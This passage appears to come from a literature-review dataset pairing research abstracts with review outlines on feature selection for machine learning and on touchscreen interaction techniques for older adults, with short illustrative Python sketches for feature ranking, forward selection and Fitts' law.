algorithms localize the search for relevant dimensions allowing them to find clusters that exist in multiple, possibly overlapping subspaces. There are two major branches of subspace clustering based on their search strategy. Top-down algorithms find an initial clustering in the full set of dimensions and evaluate the subspaces of each cluster, iteratively improving the results. Bottom-up approaches find dense regions in low dimensional spaces and combine them to form clusters. This paper presents a survey of the various subspace clustering algorithms along with a hierarchy organizing the algorithms by their defining characteristics. 
We then compare the two main approaches to subspace clustering using empirical scalability and accuracy tests and discuss some potential applications where subspace clustering could be particularly useful. --- paper_title: Toward integrating feature selection algorithms for classification and clustering paper_content: This paper introduces concepts and algorithms of feature selection, surveys existing feature selection algorithms for classification and clustering, groups and compares different algorithms with a categorizing framework based on search strategies, evaluation criteria, and data mining tasks, reveals unattempted combinations, and provides guidelines in selecting feature selection algorithms. With the categorizing framework, we continue our efforts toward building an integrated system for intelligent feature selection. A unifying platform is proposed as an intermediate step. An illustrative example is presented to show how existing feature selection algorithms can be integrated into a meta algorithm that can take advantage of individual algorithms. An added advantage of doing so is to help a user employ a suitable algorithm without knowing details of each algorithm. Some real-world applications are included to demonstrate the use of feature selection in data mining. We conclude this work by identifying trends and challenges of feature selection research and development. --- paper_title: Feature selection for classification: A review paper_content: Nowadays, the growth of high-throughput technologies has resulted in exponential growth in the harvested data with respect to both dimensionality and sample size. The trend of this growth in the UCI machine learning repository is shown in Figure 1. Efficient and effective management of these data becomes increasingly challenging. Traditionally, manual management of these datasets has proven to be impractical. Therefore, data mining and machine learning techniques were developed to automatically discover knowledge and recognize ... ---
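The fast correlation-based filter abstract above ranks features by their correlation with the class and then removes redundancy among the relevant features without full pairwise analysis. A standard information-theoretic choice for that correlation is symmetrical uncertainty, SU(X, Y) = 2 * IG(X; Y) / (H(X) + H(Y)); the sketch below computes it for discrete (integer-coded) features and ranks columns by relevance. The function names are illustrative, and the redundancy-removal step of the cited method is not reproduced here.

```python
import numpy as np
from collections import Counter

def entropy(values):
    """Shannon entropy (in bits) of a discrete sequence."""
    counts = np.array(list(Counter(values).values()), dtype=float)
    p = counts / counts.sum()
    return float(-(p * np.log2(p)).sum())

def symmetrical_uncertainty(x, y):
    """SU(X, Y) = 2 * IG(X; Y) / (H(X) + H(Y)), normalized to [0, 1]."""
    x, y = np.asarray(x), np.asarray(y)
    h_x, h_y = entropy(x), entropy(y)
    # H(X | Y): condition on each observed value of Y.
    h_x_given_y = sum(np.mean(y == v) * entropy(x[y == v]) for v in np.unique(y))
    info_gain = h_x - h_x_given_y
    denom = h_x + h_y
    return 2.0 * info_gain / denom if denom > 0 else 0.0

def rank_features(X, y):
    """Order the columns of X by decreasing relevance to the class labels y."""
    scores = [symmetrical_uncertainty(X[:, j], y) for j in range(X.shape[1])]
    return sorted(range(X.shape[1]), key=lambda j: scores[j], reverse=True)
```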
Title: Feature Selection: A Literature Review Section 1: Introduction Description 1: Provide an overview of the increase in high-dimensional data, the challenges it poses for machine learning methods, and the importance of feature selection in data preprocessing. Section 2: State of Art Description 2: Discuss the various feature selection methods proposed in the literature and the difficulty of comparing them due to the challenges posed by the nature of the datasets. Section 3: Defining Feature Relevance Description 3: Explain the concept of feature relevance and classify features as irrelevant, weakly relevant, or strongly relevant, with definitions and graphical representation. Section 4: Feature Selection Description 4: Explain the process of feature selection, including the steps of subset generation, subset evaluation, stopping criteria, and result validation. Section 5: Categorization and Characteristics of Feature Selection Algorithms Description 5: Present a three-dimensional categorization framework for feature selection algorithms, based on search strategy, evaluation criteria, and data mining tasks. Section 6: Data Mining Tasks Description 6: Discuss the space of characteristics of feature selection algorithms according to their criteria, including search organization, successor generation, and evaluation measure. Section 7: Application of Feature Selection in Real World Description 7: Provide examples and applications of feature selection in areas such as text categorization, remote sensing, intrusion detection, genomic analysis, and image retrieval. Section 8: Forward vs Backward Selection Description 8: Compare forward selection and backward selection methods for feature selection, discussing their pros and cons. Section 9: Feature Selection with Large Dimensional Data Description 9: Discuss feature selection challenges and solutions in the context of large-dimensional data, including scalability issues and proposed approaches. Section 10: Subspace Searching and Instance Selection Description 10: Explore the concept of subspace searching and instance selection in the context of clustering, with references to existing algorithms and future research opportunities. Section 11: Feature Selection with Sparse Data Matrix Description 11: Address the challenges of feature selection in sparse data matrices commonly encountered in business and web technologies, and the need for efficient algorithms. Section 12: Scalability and Stability of Feature Selection Description 12: Discuss the importance of scalability and stability in feature selection algorithms, particularly for large datasets and online classifiers. Section 13: Conclusion Description 13: Summarize the key points of the review, including definitions, procedures, approaches, advantages, and challenges in feature selection, and provide insights into future research directions.
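Section 8 of the outline above contrasts forward and backward selection, and the adaptive forward-backward greedy abstract cited earlier motivates mixing the two. As a baseline point of reference, here is a minimal sketch of plain sequential forward selection in a wrapper setting; it assumes scikit-learn-style estimators and cross_val_score, and the helper name forward_select is an illustrative choice rather than an API from any cited work.

```python
import numpy as np
from sklearn.model_selection import cross_val_score

def forward_select(estimator, X, y, max_features, cv=5):
    """Greedy wrapper: at each step add the feature that most improves
    cross-validated score; stop when no candidate helps or the budget
    of max_features is reached."""
    selected, remaining = [], list(range(X.shape[1]))
    best_score = -np.inf
    while remaining and len(selected) < max_features:
        trial_scores = {
            j: cross_val_score(estimator, X[:, selected + [j]], y, cv=cv).mean()
            for j in remaining
        }
        j_best = max(trial_scores, key=trial_scores.get)
        if trial_scores[j_best] <= best_score:
            break                      # no single remaining feature improves the score
        best_score = trial_scores[j_best]
        selected.append(j_best)
        remaining.remove(j_best)
    return selected, best_score
```

Backward elimination is the mirror image (start from all features and repeatedly drop the least useful one), and the adaptive scheme cited above interleaves backward steps into the forward pass whenever they improve the solution.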
Interaction techniques for older adults using touchscreen devices: a literature review
12
--- paper_title: Studying Point-Select-Drag Interaction Techniques for Older People with Cognitive Impairment paper_content: Graphical user interfaces and interactions that involve pointing to items and dragging them are becoming more common in rehabilitation and assistive technologies. We are currently investigating interaction techniques to understand point-select-drag interactions for older people with cognitive impairment. In particular, this study reports how older perform such tasks. Significant differences in behavior between all of the interaction techniques are observed and the reasons for these differences are discussed according the cognitive impairment. --- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: Aging, motor control, and the performance of computer mouse tasks paper_content: Because of the increased presence of computers in work and everyday life and the demographic "graying" of America, there is a need for interface designs that promote accessibility for older people. This study examined age differences in the performance of basic computer mouse control techniques. An additional goal of the study was to examine the influence of age-related changes in psychomotor abilities on mouse control. A total of 60 participants in 3 age groups (20--39 years, 40--59 years, and 60--75 years) performed 4 target acquisition tasks (pointing, clicking, double-clicking, and dragging) using a computer mouse. The data indicated that the older participants had more difficulty performing mouse tasks than the younger participants. Differences in performance attributable to age were found for the more complex tasks (clicking and double-clicking). Furthermore, age-related changes in psychomotor abilities were related to age differences in performance. We discuss applications to computer interface des... 
--- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Studying Point-Select-Drag Interaction Techniques for Older People with Cognitive Impairment paper_content: Graphical user interfaces and interactions that involve pointing to items and dragging them are becoming more common in rehabilitation and assistive technologies. We are currently investigating interaction techniques to understand point-select-drag interactions for older people with cognitive impairment. In particular, this study reports how older perform such tasks. Significant differences in behavior between all of the interaction techniques are observed and the reasons for these differences are discussed according the cognitive impairment. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. 
--- paper_title: Usability of touch-panel interfaces for older adults. paper_content: The usability of a touch-panel interface was compared among young, middle-aged, and older adults. In addition, a performance model of a touch panel was developed so that pointing time could be predicted with higher accuracy. Moreover, the target location to which a participant could point most quickly was determined. The pointing time with a PC mouse was longer for the older adults than for the other age groups, whereas there were no significant differences in pointing time among the three age groups when a touch-panel interface was used. Pointing to the center of a square target led to the fastest pointing time among nine target locations. Based on these results, we offer some guidelines for the design of touch-panel interfaces and show implications for users of different age groups. Actual or potential applications of this research include designing touch-panel interfaces to make them accessible for older adults and predicting movement times when users operate such devices. --- paper_title: Basic senior personas: a representative design tool covering the spectrum of European older adults paper_content: The persona method is a powerful approach to focus on needs and characteristics of target users, keeping complex user data,numbers and diagrams alive during the whole design cycle.However, the development of prosperous personas requires a considerable amount of time, effort and specific skills. This paper introduces the development of a set of 30 basic senior personas, covering a broad range of characteristics of European older adults, following a quantitative development approach. The aim of this tool is to support researchers and developers in extending empathy for their target users when developing ICT solutions for the benefit of older adults. The main innovation lies in the representativeness of the basic senior personas. The personas build on multifaceted quantitative data from a single source including micro-level information from roughly 12,500 older individuals living in different European countries. The resulting personas may be applied in their basic form but are extendable to specific contexts. Also, the suggested tool addresses the drawbacks of current existing personas describing older adults: being representative and cost-efficient. The basic senior personas, a filter tool, a manual and templates for "persona marketing" articles are available for free online under http://elderlypersonas.cure.at. --- paper_title: Aging, motor control, and the performance of computer mouse tasks paper_content: Because of the increased presence of computers in work and everyday life and the demographic "graying" of America, there is a need for interface designs that promote accessibility for older people. This study examined age differences in the performance of basic computer mouse control techniques. An additional goal of the study was to examine the influence of age-related changes in psychomotor abilities on mouse control. A total of 60 participants in 3 age groups (20--39 years, 40--59 years, and 60--75 years) performed 4 target acquisition tasks (pointing, clicking, double-clicking, and dragging) using a computer mouse. The data indicated that the older participants had more difficulty performing mouse tasks than the younger participants. Differences in performance attributable to age were found for the more complex tasks (clicking and double-clicking). 
Furthermore, age-related changes in psychomotor abilities were related to age differences in performance. We discuss applications to computer interface des... --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Investigating familiar interactions to help older adults learn computer applications more easily paper_content: Many older adults wish to gain competence in using a computer, but many application interfaces are perceived as complex and difficult to use, deterring potential users from investing the time to learn them. Hence, this study looks at the potential of 'familiar' interface design which builds upon users' knowledge of real world interactions, and applies existing skills to a new domain. Tools are provided in the form of familiar visual objects, and manipulated like real-world counterparts, rather than with buttons, icons and menus found in classic WIMP interfaces. ::: ::: This paper describes the formative evaluation of computer interactions that are based upon familiar real world tasks, which support multitouch interaction, involves few buttons and icons, no menus, no right-clicks or double-clicks and no dialogs. Using an example of an email client to test the principles of using "familiarity", the initial feedback was very encouraging, with 3 of the 4 participants being able to undertake some of the basic email tasks with no prior training and little or no help. The feedback has informed a number of refinements of the design principles, such as providing clearer affordance for visual objects. A full study is currently underway. 
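The touch-panel usability abstract above mentions a performance model for predicting pointing time, and several of the surrounding studies compare target-acquisition tasks across devices and age groups. The cited abstracts do not state which model they use, but the usual baseline for this kind of prediction is Fitts' law in its Shannon formulation, MT = a + b * log2(D/W + 1). The sketch below fits the coefficients a and b from measured trials with ordinary least squares; the trial values and the function name are illustrative only.

```python
import numpy as np

def fit_fitts_law(distances_mm, widths_mm, times_ms):
    """Fit MT = a + b * log2(D / W + 1) by least squares and return (a, b),
    so pointing time can be predicted for new target distances and widths."""
    index_of_difficulty = np.log2(np.asarray(distances_mm) / np.asarray(widths_mm) + 1)
    design = np.column_stack([np.ones_like(index_of_difficulty), index_of_difficulty])
    (a, b), *_ = np.linalg.lstsq(design, np.asarray(times_ms, dtype=float), rcond=None)
    return a, b

# Illustrative trials: closer and wider targets are acquired faster.
D = [40, 80, 160, 160]      # movement distance in mm
W = [12, 12, 8, 5]          # target width in mm
T = [420, 520, 640, 760]    # observed movement time in ms
a, b = fit_fitts_law(D, W, T)
print(f"predicted MT for D=100 mm, W=8 mm: {a + b * np.log2(100 / 8 + 1):.0f} ms")
```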
--- paper_title: Comparison between single-touch and multi-touch interaction for older people paper_content: This paper describes a study exploring the multi-touch interaction for older adults. The aim of this experiment was to check the relevance of this interaction versus single-touch interaction to realize object manipulation tasks: move, rotate and zoom. For each task, the user had to manipulate a rectangle and superimpose it to a picture frame. Our study shows that adults and principally older adults had more difficulties to realize these tasks for multi-touch interaction than for single-touch interaction. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: Evaluating swabbing: a touchscreen input method for elderly users with tremor paper_content: Elderly users suffering from hand tremor have difficulties interacting with touchscreens because of finger oscillation. It has been previously observed that sliding one's finger across the screen may help reduce this oscillation. In this work, we empirically confirm this advantage by (1) measuring finger oscillation during different actions and (2) comparing error rate and user satisfaction between traditional tapping and swabbing in which the user slides his finger towards a target on a screen edge to select it. We found that oscillation is generally reduced during sliding. Also, compared to tapping, swabbing resulted in improved error rates and user satisfaction. We believe that swabbing will make touchscreens more accessible to senior users with tremor. --- paper_title: Age-related differences in performance with touchscreens compared to traditional mouse input paper_content: Despite the apparent popularity of touchscreens for older adults, little is known about the psychomotor performance of these devices. 
We compared performance between older adults and younger adults on four desktop and touchscreen tasks: pointing, dragging, crossing and steering. On the touchscreen, we also examined pinch-to-zoom. Our results show that while older adults were significantly slower than younger adults in general, the touchscreen reduced this performance gap relative to the desktop and mouse. Indeed, the touchscreen resulted in a significant movement time reduction of 35% over the mouse for older adults, compared to only 16% for younger adults. Error rates also decreased. --- paper_title: The elderly interacting with a digital agenda through an RFID pen and a touch screen paper_content: Ambient Assisted Living (AAL) aims to enhance quality of life of elder and impaired people. Thanks to the advances in Information and Communication Technologies (ICT), it is now possible not only to support new home services to improve their quality of life, but also to provide them with more natural, simple and multimodal interaction styles. It enables introducing new better-suited interaction styles for performing tasks according to user need, abilities and the usage conditions. In this paper, a digital agenda application is described and tested by a group of elderly users. This customized personal agenda allows elders to create agenda entries, to view calendar entries and a person's telephone without typing any letter or number. Through observation and the capture of data we studied how six participants (ages from 66 to 74) interacted with the personal agenda through a touch screen and an RFID-based interface. The RFID interaction consisted of a sheet-like physical object' the RFID board', and a pen-like object 'the IDBlue pen' that the users used to choose the desired option in the board. Beside the users' satisfaction, interesting results have been found that make us aware of valuable information to enhance their interaction with the digital world, as well as, their quality of life. Moreover, it is shown how a pen-like object and a sheet-like one can be used by the elderly to interact with the digital world. --- paper_title: Gestural interfaces for elderly users: Help or hindrance paper_content: In this paper we investigate whether finger gesture input is a suitable input method, especially for older users (60+) with respect to age-related changes in sensory, cognitive and motor abilities. We present a study in which we compare a group of older users to a younger user group on a set of 42 different finger gestures on measures of speed and accuracy. The size and the complexity of the gestures varied systematically in order to find out how these factors interact with age on gesture performance. The results showed that older users are a little slower, but not necessarily less accurate than younger users, even on smaller screen sizes, and across different levels of gesture complexity. This indicates that gesture-based interaction could be a suitable input method for older adults. At least not a hindrance - maybe even a help. --- paper_title: Elderly text-entry performance on touchscreens paper_content: Touchscreen devices have become increasingly popular. Yet they lack of tactile feedback and motor stability, making it difficult effectively typing on virtual keyboards. This is even worse for elderly users and their declining motor abilities, particularly hand tremor. In this paper we examine text-entry performance and typing patterns of elderly users on touch-based devices. 
Moreover, we analyze users' hand tremor profile and its relationship to typing behavior. Our main goal is to inform future designs of touchscreen keyboards for elderly people. To this end, we asked 15 users to enter text under two device conditions (mobile and tablet) and measured their performance, both speed- and accuracy-wise. Additionally, we thoroughly analyze different types of errors (insertions, substitutions, and omissions) looking at touch input features and their main causes. Results show that omissions are the most common error type, mainly due to cognitive errors, followed by substitutions and insertions. While tablet devices can compensate for about 9% of typing errors, omissions are similar across conditions. Measured hand tremor largely correlates with text-entry errors, suggesting that it should be approached to improve input accuracy. Finally, we assess the effect of simple touch models and provide implications to design. --- paper_title: Design and Development of a Mobile Medical Application for the Management of Chronic Diseases: Methods of Improved Data Input for Older People paper_content: The application of already widely available mobile phones would provide medical professionals with an additional possibility of outpatient care, which may reduce medical cost at the same time as providing support to elderly people suffering from chronic diseases, such as diabetes and hypertension. To facilitate this, it is essential to apply user centered development methodologies to counteract opposition due to the technological inexperience of the elderly. In this paper, we describe the design and development of a mobile medical application to help deal with chronic diseases in a home environment. The application is called MyMobileDoc and includes a graphical user interface for patients to enter medical data including blood pressure; blood glucose levels; etc. Although we are aware that sensor devices are being marketed to measure this data, subjective data, for example, pain intensity and contentment level must be manually input. We included 15 patients aged from 36 to 84 (mean age 65) and 4 nurses aged from 20 to 33 (mean age 26) in several of our user centered development cycles. We concentrated on three different possibilities for number input. We demonstrate the function of this interface, its applicability and the importance of patient education. Our aim is to stimulate incidental learning, enhance motivation, increase comprehension and thus acceptance. --- paper_title: Aging, motor control, and the performance of computer mouse tasks paper_content: Because of the increased presence of computers in work and everyday life and the demographic "graying" of America, there is a need for interface designs that promote accessibility for older people. This study examined age differences in the performance of basic computer mouse control techniques. An additional goal of the study was to examine the influence of age-related changes in psychomotor abilities on mouse control. A total of 60 participants in 3 age groups (20--39 years, 40--59 years, and 60--75 years) performed 4 target acquisition tasks (pointing, clicking, double-clicking, and dragging) using a computer mouse. The data indicated that the older participants had more difficulty performing mouse tasks than the younger participants. Differences in performance attributable to age were found for the more complex tasks (clicking and double-clicking). 
Furthermore, age-related changes in psychomotor abilities were related to age differences in performance. We discuss applications to computer interface des... --- paper_title: Tap or touch?: pen-based selection accuracy for the young and old paper_content: The effect of the decline in cognitive, perceptive, and motor abilities on older adults' performance with input devices has been well documented in several experiments. None of these experiments, however, have provided information on the challenges faced by older adults when using pens to interact with handheld computers. To address this need, we conducted a study to learn about the performance of older adults in simple pen-based tasks with handheld computers. The study compared the performance of twenty 18-22 year olds, twenty 50-64 year olds, and twenty 65-84 year olds. We found that for the most part, older adults were able to complete tasks accurately. An exception occurred with the low accuracy rates achieved by 65-84 year old participants when tapping on targets of the same size as the standard radio buttons, checkboxes, and icons on the PocketPC. An alternative selection technique we refer to as "touch" enabled 65-84 year olds to select targets more accurately. This technique did not negatively affect the performance of the other participants. If tapping to select, making standard-sized targets 50 percent larger provided 65-84 year olds with similar advantages to switching to "touch" interactions. The results suggest that "touch" interactions need to be further explored to understand whether they will work in more realistic situations. --- paper_title: Exploring the accessibility and appeal of surface computing for older adult health care support paper_content: This paper examines accessibility issues of surface computing with older adults and explores the appeal of surface computing for health care support. We present results from a study involving 20 older adults (age 60 to 88) performing gesture-based interactions on a multitouch surface. Older adults were able to successfully perform all actions on the surface computer, but some gestures that required two fingers (resize) and fine motor movement (rotate) were problematic. Ratings for ease of use and ease of performing each action as well as time required to figure out an action were similar to that of younger adults. Older adults reported that the surface computer was less intimidating, less frustrating, and less overwhelming than a traditional computer. The idea of using a surface computer for health care support was well-received by participants. We conclude with a discussion of design issues involving surface computing for older adults and use of this technology for health care. --- paper_title: Text entry on handheld computers by older users paper_content: Small pocket computers offer great potential in workplaces where mobility is needed to collect data or access reference information while carrying out tasks such as maintenance or customer support. This paper reports on three studies examining the hypothesis that data entry by older workers is easier when the pocket computer has a physical keyboard, albeit a small one, rather than a touchscreen keyboard. Using a counter-balanced, within-subjects design the accuracy and speed with which adults over 55 years of age could make or modify short text entries was measured for both kinds of pocket computer. 
The keyboard computer was the Hewlett Packard 360LX (HP), but the touch-screen computers varied across studies (experiment 1: Apple Newton™ and PalmPilot™; experiment 2: Philips Nino™; experiment 3: Casio E10™). All studies showed significant decrements in accuracy and speed when entering text via the touch-screen. Across studies, most participants preferred using the HP's small physical keyboard. Even after a... --- paper_title: A Study on the Icon Feedback Types of Small Touch Screen for the Elderly paper_content: Small touch screens are widely used in applications such as bank ATMs, point-of-sale terminals, ticket vending machines, facsimiles, and home automation in daily life. They are intuition-oriented and easy to operate. There are many elements that affect small-screen touch performance. One of the essential ones is icon feedback. However, in striving merely for an attractive icon feedback appearance and an interesting interaction experience, many interface designers ignore real user needs. It is critical for them to trade off the icon feedback type against the needs of different users in the touch interaction. This is especially important when the user's capability is very limited. This paper describes a pilot study for identifying the factors that determine icon feedback usability on small touch screens in four older adult Cognitrone groups, since current research has aimed mostly at general icon guidelines and recommendations and has failed to consider and define the specific needs of small touch screen interfaces for the elderly. In this paper, we present a concept centered on human needs and use a cognitive assessment tool, the Cognitrone test, to measure older adults' attention and concentration capability and to learn more about how to evaluate and design suitable small-screen icon feedback types. Forty-five elderly participants took part. Each subject was asked to complete a battery of Cognitrone tests and was assigned to one of 4 groups. Each subject was also requested to perform a set of 'continuous touch' usability tasks on a small touch screen and to comment on open-ended questions. Results are discussed with respect to the perceptual and cognitive factors that influence older adults in the use of icon feedback on small touch screens. The study showed significant associations between icon feedback performance and factors of attention and concentration. However, this interrelation was much stronger for Group 2 and Group 4, especially for Type B, Type C and Type G. Moreover, consistent with previous research, older participants were less sensitive and required a longer time to adapt to the high-detailed icon feedback. These results are discussed in terms of icon feedback design strategies for interface designers. --- paper_title: Slipping and drifting: using older users to uncover pen-based target acquisition difficulties paper_content: This paper presents the results of a study to gather information on the underlying causes of pen-based target acquisition difficulty. In order to observe both simple and complex interaction, two tasks (menu and Fitts' tapping) were used. Thirty-six participants across three age groups (18-54, 54-69, and 70-85) were included to draw out both general shortcomings of targeting, and those difficulties unique to older users. Three primary sources of target acquisition difficulty were identified: slipping off the target, drifting unexpectedly from one menu to the next, and missing a menu selection by selecting the top edge of the item below.
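For readers unfamiliar with the Fitts' tapping task used in the study above, movement time in such tasks is commonly modelled with Fitts' law, MT = a + b * log2(D/W + 1), where D is the distance to the target and W its width. The sketch below is a minimal illustration with purely hypothetical constants a and b, not values estimated from any of the cited experiments.

```python
import math

def fitts_movement_time(distance, width, a=0.2, b=0.1):
    """Predict movement time (seconds) for a pointing task using the Shannon
    formulation of Fitts' law: MT = a + b * log2(D/W + 1).

    distance: centre-to-centre distance to the target (e.g. mm)
    width:    target width along the direction of motion (same unit)
    a, b:     device- and population-specific constants (illustrative here)
    """
    index_of_difficulty = math.log2(distance / width + 1)  # in bits
    return a + b * index_of_difficulty

# Halving the target width raises the index of difficulty and the predicted time.
print(fitts_movement_time(distance=80, width=12))
print(fitts_movement_time(distance=80, width=6))
```

The same relation explains why enlarging targets, as several of the studies in this section recommend for older users, lowers the index of difficulty and hence the predicted movement time.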
Based on these difficulties, we then evolved several designs for improving pen-based target acquisition. An additional finding was that including older users as participants allowed us to uncover pen-interaction deficiencies that we would likely have missed otherwise. --- paper_title: Lowering elderly Japanese users’ resistance towards computers by using touchscreen technology paper_content: The standard qwerty keyboard is considered to be a major source of reluctance towards computer technology use by Japanese elderly, due to their limited experience with typewriters and the high cognitive demand involved in inputting Japanese characters. The touchscreen enables users to enter Japanese characters more directly and is expected to moderate this resistance. An e-mail terminal with a touchscreen was developed and compared with the same terminal using a standard keyboard and mouse. Computer attitudes and subjective evaluations of 32 older adults were measured. The results showed that the anxiety factor of computer attitudes declined significantly in the touchscreen condition. --- paper_title: Design pattern TRABING: touchscreen-based input technique for people affected by intention tremor paper_content: Tremor patients are frequently facing problems when interacting with IT systems and services. They do not reach the same levels of input efficiency and easily become unhappy with a technology they do not perceive as a general asset. Cases of Intention tremor show a significant comparative rise in inaccurate movement towards a real button or virtual buttons on touch screens, as this particular tremor increases its symptoms when approaching a desired physical target. People suffering from this specific tremor have been identified as the target group. This group has been closely investigated and thus, a new input procedure has been developed which may be used on standard touch screens. The new technique enables users, accordingly tremor patients, to fully operate IT-based systems and therefore possess full control over input. Deviations caused by the tremor are compensated with a continuous movement instead of a single targeted move which remains the most difficult task to the user. Also, the screen surface will present a frictional resistance, which significantly hinders tremor symptoms. Input can be identified by the computer system with high accuracy, by means of special heuristics, which support barrier free access beyond the target group. --- paper_title: Elderly User Evaluation of Mobile Touchscreen Interactions paper_content: Smartphones with touchscreen-based interfaces are increasingly used by non-technical groups including the elderly. However, application developers have little understanding of how senior users interact with their products and of how to design senior-friendly interfaces. As an initial study to assess standard mobile touchscreen interfaces for the elderly, we conducted performance measurements and observational evaluations of 20 elderly participants. The tasks included performing basic gestures such as taps, drags, and pinching motions and using basic interactive components such as software keyboards and photo viewers. We found that mobile touchscreens were generally easy for the elderly to use and a week's experience generally improved their proficiency. However, careful observations identified several typical problems that should be addressed in future interfaces. 
We discuss the implications of our experiments, seeking to provide informal guidelines for application developers to design better interfaces for elderly people. --- paper_title: Use of Computer Input Devices by Older Adults paper_content: A sample of 85 seniors was given experience (10 trials) playing two computer tasks using four input devices (touch screen, enlarged mouse [EZ Ball], mouse, and touch pad). Performance measures assessed both accuracy and time to complete components of the game for these devices. As well, participants completed a survey where they evaluated each of the devices. Seniors also completed a series of measures assessing visual memory, visual perception, motor coordination, and motor dexterity. Overall, previous experience with computers had a significant impact on the type of device that yielded the highest accuracy and speed performance, with different devices yielding better performance for novices versus experienced computer users. Regression analyses indicated that the mouse was the most demanding device in terms of the cognitive and motor-demand measures. Discussion centers on the relative benefits and perceptions regarding these devices among senior populations. --- paper_title: Investigation of Input Devices for the Age-differentiated Design of Human-Computer Interaction: paper_content: Demographic change demands new concepts for the support of computer work by aging employees. In particular, computer interaction presents a barrier due to a lack of experience and age-specific changes in performance. This article presents a study in which different input devices (mouse, touch screen and eye-gaze input) were analyzed regarding their usability and according to age diversity. Furthermore, different Hybrid Interfaces that combine eye-gaze input with additional input devices were investigated. --- paper_title: A Study of Pointing Performance of Elderly Users on Smartphones paper_content: The number of global smartphone users is rapidly increasing. However, the proportion of elderly persons using smartphones is lower than that of other age groups because they feel it is difficult to use touch screens. There have only been a few studies about usability and elderly smartphone users or designs for them. Based on this background, we studied the pointing action of elderly users, which is a basic skill required to use touch screens on smartphones. We reviewed previous works to determine specific research methods and categorized them into three groups: (a) effect of target size and spacing on touch screen pointing performance, (b) effect of age on pointing performance, and (c) feedback of touch screens. To investigate the touch screen pointing performance of elderly, we conducted two experiments. In the first experiment, 3 target sizes (5 mm, 8 mm, and 12 mm) and 2 target spacings (1 mm, 3 mm) were evaluated. Adding to that, we analyzed whether touch screen pointing performance is dependent on th... --- paper_title: Evaluating swabbing: a touchscreen input method for elderly users with tremor paper_content: Elderly users suffering from hand tremor have difficulties interacting with touchscreens because of finger oscillation. It has been previously observed that sliding one's finger across the screen may help reduce this oscillation. 
